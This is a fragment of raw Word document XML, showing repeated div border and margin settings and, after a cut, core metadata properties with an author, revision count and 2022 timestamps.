      </w:divBdr>
    </w:div>
    <w:div w:id="548810560">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="948201562">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1015350682">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1146163863">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1342391862">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1563641961">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1752002225">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="95564566">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1813063950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1817410012">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19553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353D-79B9-4FE8-8CA5-B04D348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Văn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sv_trangtt</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-18T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-18T08:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>